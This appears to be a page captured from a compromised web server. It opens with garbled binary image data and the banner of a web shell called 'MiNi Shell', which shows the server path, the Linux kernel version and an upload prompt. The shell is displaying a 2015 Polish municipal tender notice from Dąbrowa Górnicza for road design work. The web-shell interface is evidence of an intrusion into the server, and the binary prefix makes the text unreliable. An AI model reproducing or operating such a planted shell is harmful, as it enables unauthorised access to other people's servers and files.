JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150601/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150601/130558-N-2015.html

<p class="kh_header"><b>Dąbrowa Górnicza: Wykonanie dokumentacji projektowej wraz z uzyskaniem decyzji ZRID dla zadania inwestycyjnego:
Budowa odcinka drogi łączącego ul. Traktową z ul. Kalinową</b><br>
<b>Numer ogłoszenia: 130558 - 2015; data zamieszczenia: 01.06.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dąbrowa Górnicza , ul. Graniczna 21, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 32 2956700, faks 32 2625032, 2956700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.dabrowa-gornicza.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowej wraz z uzyskaniem decyzji ZRID dla zadania inwestycyjnego:
Budowa odcinka drogi łączącego ul. Traktową z ul. Kalinową.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Postępowanie o udzielenie zamówienia prowadzone jest w trybie przetargu nieograniczonego  na podstawie ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2013 r., poz. 907 z późn. zm.) o wartości zamówienia poniżej 207.000,00 EUR.
Opis przedmiotu zamówienia:
1. Przedmiotem zamówienia jest wykonanie projektu budowlanego i wykonawczego odcinka drogi łączącego ul. Traktową z ul. Kalinową  o łącznej długości ok. 500 m, odwodnienia i oświetlenia ulicznego  wraz z uzyskaniem w imieniu Gminy Dąbrowa Górnicza decyzji ZRID - droga klasy KR4, (w tym ul. Traktowa po śladzie- szerokość  dostosowana do warunków, ul. Kalinowa ZRID-em - szerokość 5m).

2. Zakres przedmiotu zamówienia obejmuje: 
2.1. Prace przedprojektowe:
1.Wykonanie mapy do celów projektowych;
2. Zakup map wraz z uzyskaniem uzgodnień branżowych;
3. Uzyskanie wypisu z ewidencji gruntów wraz z mapa ewidencyjna;
4. Uzyskanie wszelkich uzgodnień, opinii, decyzji niezbędnych do wydania decyzji ZRID (zezwolenia na realizację inwestycji drogowej), w tym zatwierdzenie koncepcji i dokumentacji projektowej przez Wydział Komunikacji i Drogownictwa i Wydział Gospodarki Nieruchomościami Urzędu Miejskiego w Dąbrowie Górniczej; 
5. Uzyskanie w imieniu Zamawiającego uzgodnień branżowych od eksploatatorów urządzeń podziemnych i nadziemnych, uzyskanie warunków przebudowy urządzeń nadziemnych i podziemnych u właścicieli urządzeń oraz uzyskanie warunków przyłączenia; wykonanie uzgodnień dokumentacji projektowej 
z użytkownikami uzbrojenia, zarządcą drogi i Zamawiającym;
6. Przygotowanie dokumentacji geotechnicznej podłoża gruntowego, ocena stanu technicznego nawierzchni i rozpoznanie warunków gruntowo- wodnych;
7. Opracowanie Inwentaryzacji zieleni;
8. Przygotowanie dokumentów w celu uzyskania decyzji o wycince drzew i krzewów. Wykonawca przygotuje do organu ochrony środowiska wniosek o wydanie decyzji na wycinkę drzew i krzewów;
9. Wykonanie projektu tymczasowej organizacji ruchu;
10. Przygotowanie wniosku o wydanie decyzji o środowiskowych uwarunkowaniach zgody na realizację inwestycji;
11. Przygotowanie dokumentów do zarządcy drogi dla uzyskania decyzji na umieszczenie urządzenia obcego w drodze;
12. Uzyskanie wypisu z planu przestrzennego zagospodarowania miasta  oraz niezbędnych opinii, ekspertyz i uzgodnień;
13. Uzyskanie warunków technicznych przyłączenia do sieci energetycznej, wodociągowej, kanalizacji sanitarnej i deszczowej w przypadkach koniecznych;
14. Uzgodnienie ZUD;
15. Inne, konieczne uzgodnienia branżowe (energetyka, gazownia  -Wykonawca ponosi pełne koszty z tym związane);
16. Uczestnictwo w konsultacjach społecznych oraz uwzględnienie uwag mieszkańców podczas opracowywania dokumentacji.

2.2.Prace projektowe:
2.2.1. Wykonanie koncepcji drogi;
2.2.2. Wykonanie projektów budowlanych i projektów wykonawczych dla każdej branży osobno tj. drogi,  odwodnienia i oświetlenia ulicznego, wraz z zagospodarowaniem terenu na mapach do celów projektowych;
2.2.3. Wykonanie projektu docelowej organizacji ruchu wraz z zatwierdzeniem u zarządzającego ruchem;
2.2.4. Wykonanie projektu niezbędnej przebudowy lub zabezpieczeń kolidującego uzbrojenia;
2.2.5. Wykonanie projektu zagospodarowania terenu;
2.2.6. Opracowanie Specyfikacji Technicznej Wykonania i Odbioru Robót dla każdej branży osobno tj. drogi, odwodnienia, oświetlenia ulicznego;
2.2.7.Opracowanie przedmiarów robót dla każdej branży osobno tj. drogi, odwodnienia, oświetlenia ulicznego;
2.2.8.Opracowanie kosztorysów inwestorskich dla każdej branży osobno tj. drogi, odwodnienia, oświetlenia ulicznego;
2.2.9.Opracowanie planu BIOZ;
2.2.10. Uzyskanie w imieniu Gminy decyzji ZRID (zezwolenia na realizację inwestycji drogowej):
- 4 egz. Oryginału decyzji ZRID;
- 4 egz. Projektu podziału nieruchomości wraz z wykazem zmian gruntowych dla każdej działki osobno;
- 2 egz. wyrysu z mapy ewidencyjnej i 2 egz. wypisu z rejestru gruntów (dokumenty niezbędne do odłączenia  działek w KW).

Uwaga: przed opracowaniem przedmiarów robót oraz STWiOR, Wykonawca jest zobowiązany do uzgodnienia z Zamawiającym poziomu zagregowania robót objętych projektem.  
3.3.Dokumentacja projektowa musi być poprawna pod względem technicznym. Należy uwzględnić zastosowanie rozwiązań standardowych skutkujących optymalizacją kosztów. 

3.4. Obowiązki w ramach nadzoru autorskiego  wynikające z odrębnych przepisów i niniejszej SIWZ - realizowane w czasie prowadzenia przez Zamawiającego procedury udzielenia zamówienia publicznego na wyłonienie wykonawcy zaprojektowanych robót budowlanych oraz na etapie ich realizacji i odbioru (planowane rozpoczęcie inwestycji nie później niż maj 2016 r. Zakładany okres pełnienia nadzoru autorskiego  12 miesięcy).

3.5. Dokumentację projektową należy sporządzić w 4 egz. dla projektów budowlanych i 6 egz. dla projektów wykonawczych, specyfikacje techniczne wykonania i odbioru robót oraz przedmiary robót należy sporządzić w 4 egz. w wersji papierowej i w 1 egz. w wersji elektronicznej (tylko do odczytu). Kosztorysy inwestorskie w 1 egz. w wersji papierowej i 1 egz. w wersji elektronicznej (tylko do odczytu). Niezależnie od dokumentacji wymienionej wyżej Wykonawca wykona i poniesie koszt dla dokumentacji potrzebnej do uzgodnień.
Koncepcję składającą się na przedmiot zamówienia należy sporządzić w formie papierowej i elektronicznej (w 2 egzemplarzach w wersji papierowej).  

Dokumentacja projektowa w formie elektronicznej winna być przekazana Zamawiającemu na płycie CD w formie plików w formacie xls, doc lub PDF zabezpieczonych przed zmianami i umożliwiających przesłanie dokumentacji drogą elektroniczną.
Kosztorysy inwestorskie oraz przedmiary robót winny być przekazane na osobnych płytach CD, w formacie PDF.

3.6.Dokumentację projektową należy wykonać zgodnie z:
1.Ustawą z dn. 7 lipca 1994r. Prawo budowlane (Dz. U. z 2013r. Nr 1409 j.t.);
2.Rozporządzeniem Ministra Infrastruktury z dnia 6 listopada 2008r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2008r. Nr 201, poz.1239 z późn. zm.);
3.Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U.  z 2013r. 1129 j.t.);
4.Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia metod                           i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym. (Dz. U. z 2004 r. Nr 130, poz. 1389);
5.Rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002r. w sprawie warunków technicznych jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. 2002r. Nr 75, poz. 690 z późn. zm.);
6.obowiązującym miejscowym planem zagospodarowania przestrzennego miasta Dąbrowa Górnicza; 
7.Ustawą z dn. 18 lipca 2001r. Prawo wodne (Dz. U. z 2012 r. Nr 145 j.t. z późn. zm.);
8.Ustawą z dn. 27 kwietnia 2001r. Prawo ochrony środowiska (t.j. z 2008r. Dz. U. Nr 25, poz. 150 z późn. zm.);
9.Rozporządzeniem Ministra Transportu i Gospodarki z dnia 02 marca 1999r. w sprawie warunków, jakim powinny odpowiadać drogi publiczne i ich usytuowanie (Dz. U. z 1999r. Nr 43, poz. 430 z późn. zm.);
10.Ustawą z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2003 Nr 80, poz. 717 z późn. zm.);
11.Ustawą z dnia 04 lutego 1994r. Prawo geologiczne i górnicze (Dz. U. z 2011 Nr 163, poz. 981 z późn. zm.);
12.Ustawą z dnia 17 maja 1989r. Prawo geodezyjne i kartograficzne (t.j. Dz. U. z 2005 Nr 240, poz. 2027 z póź. zm.);
13.Ustawą z dnia 21 marca 1985r. o drogach publicznych (Dz.U.2013.260 j.t. z późn. zm.);
14.Ustawą o z dnia 03 października 2008r. o udostępnieniu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. z  2008 nr 199 poz. 1227 z późn. zm.);
15.Ustawą z dnia 7.05.2010 r. o wspieraniu rozwoju usług i sieci telekomunikacyjnych (Dz.U.2010. Nr 106, poz. 675 z późn. zm.);
16.Rozporządzeniem Ministra Infrastruktury z 23 września 2003r. w sprawie szczegółowych warunków zarządzania ruchem na drogach oraz wykonywania nadzoru nad tym zarządzaniem (Dz. U. z 2003r. Nr 177, poz. 1729);
17.Ustawą z dnia 20 czerwca 1997r. prawo o ruchu drogowym z dnia 20 czerwca 1997r. (Dz. U. z 2005r. poz. 108, poz. 908 z późn. zm.);
18. oraz zgodnie z innymi obowiązującymi przepisami w tym zakresie.

3.7. Mapa z lokalizacją drogi stanowi załącznik nr 8 do SIWZ. 

3.8. Zamawiający nie dopuszcza wskazania w opracowanej dokumentacji projektowej znaków towarowych, nazw własnych producentów, patentów lub pochodzenia produktów, urządzeń i materiałów.
Jedynym wyjątkiem od tej zasady jest przypadek, w którym wskazanie znaków towarowych jest uzasadnione specyfiką przedmiotu zamówienia i nie ma możliwości opisania przedmiotu zamówienia za pomocą dostatecznie dokładnych określeń, a wykonawca uzyskał uprzednio pisemną zgodę Zamawiającego na takie wskazanie.
W przypadku wyrażenia zgody przez Zamawiającego na wskazanie znaku towarowego, patentu lub pochodzenia, wykonawca jest zobowiązany opisać w dokumentacji specyfikę powodującą konieczność takiego wskazania oraz użyć słów lub równoważne. W takim przypadku obowiązkiem wykonawcy jest określenie szczegółowych parametrów, które umożliwią dopuszczenie towarów i urządzeń innych producentów jako równoważnych..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1.Zamawiający przewiduje udzielenie zamówień uzupełniających w stosunku do zamówienia podstawowego, o których mowa w art. 67 ust. 1 pkt. 6 Ustawy do wysokości 20% wartości zamówienia podstawowego.
2.W zakres zamówienia uzupełniającego mogą wchodzić: prace projektowe dotyczące: odcinka drogi łączącej ul. Traktową z ul. Kalinową, odwodnienia, oświetlenia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.24.80.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 8.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga od Wykonawców wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia o spełnieniu wymagań określonych w art. 22 ust. 1 Ustawy - załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert ,a jeżeli okres prowadzenia działalności jest krótszy w tym okresie,  wykonał min. 2 usługi polegające na wykonaniu dokumentacji projektowej (projekt budowlany i wykonawczy) na  budowę  lub przebudowę drogi wraz z oświetleniem ulicznym o wartości min. 40.000 zł brutto każda.

                Uwagi: 
1. Jeżeli zakres usług przedstawionych w dokumencie złożonym na  potwierdzenie, że usługi zostały wykonane należycie jest szerszy od powyżej określonego przez Zamawiającego należy w wykazie usług podać wartość usług odpowiadających zakresowi przedmiotu zamówienia.
2. Równowartość w złotych zadań rozliczanych w walutach obcych zostanie określona według średniego kursu złotego w stosunku do walut obcych ogłoszonego przez NBP obowiązującego w dniu, w którym ogłoszenie o niniejszym postępowaniu zostało zamieszczone w Biuletynie Zamówień Publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia o spełnieniu wymagań określonych w art. 22 ust. 1 Ustawy - załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje:
- min 1 osobą posiadającą uprawnienia budowlane do projektowania w specjalności drogowej, zgodnie z ustawą z dnia 7 lipca 1994r. Prawo budowlane (Dz. U. z 2013r. poz. 1409 z późn. zm.) lub odpowiadające im ważne uprawnienia budowlane,
- min 1 osobą posiadającą uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych, zgodnie z ustawą z dnia 7 lipca 1994r. Prawo budowlane (Dz. U. z 2013r. poz. 1409 z późn. zm.)  lub odpowiadające im ważne uprawnienia budowlane,
-  min 1 osobą posiadającą uprawnienia budowlane do projektowania w specjalności instalacyjnej  w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, zgodnie z ustawą z dnia 7 lipca 1994r. Prawo budowlane (Dz. U. z 2013r. poz. 1409 z późn. zm.) lub odpowiadające im ważne uprawnienia budowlane.
Zamawiający dopuszcza  łączenie funkcji w przypadku posiadania więcej niż jednego z ww. uprawnień przez jedną osobę.
Mając na uwadze obowiązujące w Polsce przepisy prawa krajowego - Ustawa Prawo Budowlane art. 12, pkt 7 oraz 12a, w przypadku osób spoza Polski możliwe jest uzyskanie decyzji w sprawie uznania kwalifikacji zawodowych w budownictwie, nabytych w państwach członkowskich UE oraz wpisu do stosownej izby, po przeprowadzeniu właściwego postępowania weryfikacyjnego przez odpowiedni organ samorządu zawodowego w Polsce na zasadach określonych w Ustawie z dnia 18 marca 2008r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2008 r., Nr 63, poz. 394).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia o spełnieniu wymagań określonych w art. 22 ust. 1 Ustawy - załącznik nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Obowiązek wskazania przez Wykonawcę w wykazie oraz złożenia dowodów dotyczy usług pozwalających wykazać, iż Wykonawca spełnia warunek określony w pkt. III.3.2) niniejszego ogłoszenia.
W wykazie nie należy podawać informacji o dostawach niewykonanych lub wykonanych nienależycie - Zamawiający nie ocenia zdolności Wykonawcy do należytego wykonania zamówienia na podstawie art. 22 ust. 5 Ustawy (zdanie 2) - dotyczy zadania 1 i 2.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto do oferty należy załączyć:
1. formularz ofertowy - załącznik nr 1 do SIWZ (wskazana data podpisania);
2.pełnomocnictwo do reprezentowania Wykonawcy - jeżeli zostało ustanowione bądź do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie przedłożone w formie oryginału lub kopii poświadczonej przez notariusza (dotyczy również spółki cywilnej);
3. w przypadku, gdy Wykonawca będzie  polegać na zasobach Podwykonawcy - zgodnie z art. 26 ust. 2b Ustawy: Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

